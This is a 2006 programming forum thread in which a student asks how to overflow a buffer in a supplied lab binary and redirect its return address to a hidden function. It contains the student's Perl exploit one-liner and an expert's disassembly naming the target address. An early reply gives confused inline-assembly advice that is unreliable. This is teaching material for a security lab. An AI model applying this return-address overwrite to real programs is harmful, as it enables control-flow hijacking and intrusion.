Solved

C++ : Change Stack Address

Posted on 2006-11-06
15
643 Views
Last Modified: 2012-05-05
Hi!
I have doing a school project.. Stack Overrun.

I have a address of: 00401D00

I managed to find the last pointer.
Now i intend to write the pointer to the address.
Any idea?

My lecture notes somehow using perl..
converted "\x28\x13\x40" to an address: 401328

Please advice.
Cheers!
Darence
0
Comment
Question by:darence
  • 8
  • 6
15 Comments
 
LVL 12

Expert Comment

by:rajeev_devin
Comment Utility
what are you exactly trying to do ?
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
you have to use assembly language to achieve the result and it is not recommended to do so except in very very rare cases. eg exception handling where the language does not provide support for it. another is code related to powering on and off. another one is inside a debugger. and you have to be ***extremely*** careful of what you are doing because the return address of/to the caller code is stored on the stack. even main() gets called from somewhere else. i hope that is enough of a warning/discouragement to avoid the usage. anyways here is one way to do it. it is in MSVC environment and for x86 based processors.
void foo() {
  // some code
  int my_esp = 0x00401328; // assuming short is 16 bits
  __asm mov esp, tmp_esp;
  return;
}
0
 

Author Comment

by:darence
Comment Utility
I am trying to get the find the return address, change the address to some place.
In this case, its 00401D00.

I managed to find the return address, except how to point it to 00401D00.
Think need to find the assembly language to point to 00401D00.
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. First thing that you would need to do is find where the ret addr for current function is stored, i.e. the location on stack which stores IP where we would go after exiting current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. free up any dynamic memory that you need to. and return.
0
 

Author Comment

by:darence
Comment Utility
Dear jhshukla..
How can i "store" 0x00401D00 into it?

Is it just AAAAAAAAA."0x00401D00"?
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
Darence, what processor architecture are you coding for?
Let's say you determine that return address for current function is 0x01234567. How did you figure it out? what memory location did you read to get the information? let's call (i.e. name) that memory location 'ret_addr_loc'. now what you do is overwrite the 32bit value (0x01234567) at that location with the new value (0x00401D00).

for x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
depending on what compiler you are using the ways to incorporate assembly code into C++ code will differ. look up the documentation for your compiler.
0
 

Author Comment

by:darence
Comment Utility
I am using DEV-C++
Output is a .exe file.
From my sample assignment,
To get the address: 401328.
they use: "\x28\x13\x40"

Please advice.
Cheers!
Darence
0
What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
can you post the code snippet?

The machine you are using is little-endian. see http://en.wikipedia.org/wiki/Endianness for details. basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. e.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary it is stored as 01010111 00100011 i.e. 0x57 0x23 in memory. So, your string when interpreted as int becomes 0x401328. now recall the fact that C-style strings are null terminated. that adds a zero at the end making a total of 4 bytes, x28 x13 x40 x00. this becomes 0x00401328 when interpreted as an integer.
0
 

Author Comment

by:darence
Comment Utility
http://www.mediamax.com/darenceang/Hosted/hackme.rar

I am given this EXE file.
Main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the numbers of A ( being 41 ) before it goes to the return function.

I calculated it to be 20 A.. but now i do not know how to make the program GO to the bar address.

The syntax of using it is : hackme 3219914 AAAAAAAAAAblah blah blah..

If you manage to "change" the return address to BAR.
You should get a MSG saying I HAVE BEEN HACKED.

Cheers!
Darence
0
 

Author Comment

by:darence
Comment Utility
This is a sample of the perl file i am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x50\x1E\x40";
$cmd = "hackme ".$arg;
system($cmd);

It seems that IF i use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
Which should not be the case as i should be getting into a BAR function..
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
you should be getting inside bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n"
0
 

Author Comment

by:darence
Comment Utility
Ok..
I found it..
So what can i do?
This program is supposed to GET INTO bar0 function.
But IF i knoe the address, how am i going to "translate" that into whatever language is x50\x1E\x40.... :)
0
 
LVL 9

Accepted Solution

by:
jhshukla earned 30 total points
Comment Utility
I think it is probably too late for your assignment but this link might help you for oncoming projects: http://www.smidgeonsoft.prohosting.com/software.html. Get PEBrowse Professional.

Install and open the prog. Open hackme.exe with this prog.
Search for "bar4". Scroll up to the nearest location where you see "; <==0x0040xxxx(*+0xxxx), ...". This means that code jumps to current location from these listed addresses. the numbers inside () are offsets from current location.
Current location is 0x00401E50. This turns out to be your "magic" string that you use to get into bar4. You will see that it is linked from three different addresses.

Now search for bar0. similarly scroll up to find a location which is linked from three different addresses. There is also one link target right before PUSH call. Instinct tells me that this is probably not the desired address. The desired address is 0x00401C90. Try it. If that does not work, brute force your way going forward one instruction at a time.
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
bar0:
hackme.exe Section .text (0x00401000)
0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5                   MOV         EBP,ESP            
0x401C93: 83EC08                 SUB         ESP,0x8            
0x401C96: 83C4F8                 ADD         ESP,0xF8          
0x401C99: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000             PUSH        0x401C63           ; .text:Inside bar0 function. |
0x401CA6: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CAB: E8FC1E0000             CALL        0x403BAC          
0x401CB0: 83C410                 ADD         ESP,0x10          
0x401CB3: 89C0                   MOV         EAX,EAX            
0x401CB5: 50                     PUSH        EAX                
0x401CB6: E8B5F90000             CALL        0x411670          
0x401CBB: 83C410                 ADD         ESP,0x10          
0x401CBE: 83C4F8                 ADD         ESP,0xF8          
0x401CC1: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8                 ADD         ESP,0xF8          
0x401CC9: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401CCE: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CD3: E8D41E0000             CALL        0x403BAC          
0x401CD8: 83C410                 ADD         ESP,0x10          
0x401CDB: 89C0                   MOV         EAX,EAX            
0x401CDD: 50                     PUSH        EAX                
0x401CDE: E88DF90000             CALL        0x411670          
0x401CE3: 83C410                 ADD         ESP,0x10          
0x401CE6: C9                     LEAVE                          
0x401CE7: C3                     RET                            

bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5                   MOV         EBP,ESP            
0x401E53: 83EC08                 SUB         ESP,0x8            
0x401E56: 83C4F8                 ADD         ESP,0xF8          
0x401E59: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8                 ADD         ESP,0xF8          
0x401E61: 68381E4000             PUSH        0x401E38           ; .text:Inside bar4 function. |
0x401E66: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E6B: E83C1D0000             CALL        0x403BAC          
0x401E70: 83C410                 ADD         ESP,0x10          
0x401E73: 89C0                   MOV         EAX,EAX            
0x401E75: 50                     PUSH        EAX                
0x401E76: E8F5F70000             CALL        0x411670          
0x401E7B: 83C410                 ADD         ESP,0x10          
0x401E7E: 83C4F8                 ADD         ESP,0xF8          
0x401E81: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8                 ADD         ESP,0xF8          
0x401E89: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401E8E: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E93: E8141D0000             CALL        0x403BAC          
0x401E98: 83C410                 ADD         ESP,0x10          
0x401E9B: 89C0                   MOV         EAX,EAX            
0x401E9D: 50                     PUSH        EAX                
0x401E9E: E8CDF70000             CALL        0x411670          
0x401EA3: 83C410                 ADD         ESP,0x10          
0x401EA6: C9                     LEAVE                          
0x401EA7: C3                     RET                            
0
 
LVL 9

Expert Comment

by:jhshukla
Comment Utility
btw, i just figured that 0x00401D00 is bar1. are you, by any chance, trying to return to bar1 from bar0?
0

Featured Post

What Is Threat Intelligence?

Threat intelligence is often discussed, but rarely understood. Starting with a precise definition, along with clear business goals, is essential.

Join & Write a Comment

When writing generic code, using template meta-programming techniques, it is sometimes useful to know if a type is convertible to another type. A good example of when this might be is if you are writing diagnostic instrumentation for code to generat…
Introduction This article is the first in a series of articles about the C/C++ Visual Studio Express debugger.  It provides a quick start guide in using the debugger. Part 2 focuses on additional topics in breakpoints.  Lastly, Part 3 focuses on th…
The viewer will learn how to use the return statement in functions in C++. The video will also teach the user how to pass data to a function and have the function return data back for further processing.
The viewer will learn additional member functions of the vector class. Specifically, the capacity and swap member functions will be introduced.

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now